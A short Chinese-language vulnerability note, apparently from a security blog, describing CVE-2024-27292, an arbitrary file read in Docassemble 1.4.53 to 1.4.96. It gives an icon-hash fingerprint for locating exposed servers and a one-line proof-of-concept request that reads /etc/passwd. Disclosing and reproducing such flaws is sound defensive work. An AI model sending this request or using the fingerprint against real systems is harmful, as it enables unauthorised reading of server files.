登录 白背景

Docassemble interview存在任意文件读取漏洞(CVE-2024-27292)

一、漏洞简介

Docassemble是一个指导面试和文件汇编的专家系统。Docassemble interview存在任意文件读取漏洞(CVE-2024-27292)该漏洞允许攻击者通过URL操纵获得对系统信息的未经授权访问。

二、影响版本

  • 影响版本1.4.53到1.4.96

三、资产测绘

icon_hash="-575790689"

1720375834392-82df7ec5-0feb-45af-9d65-736643172e61.png

四、漏洞复现

/interview?i=/etc/passwd

1720375913493-4d8ef050-5bff-446f-9693-db4f5570ff05.png

原文: https://www.yuque.com/xiaokp7/ocvun2/bg66kvel3kfzhle0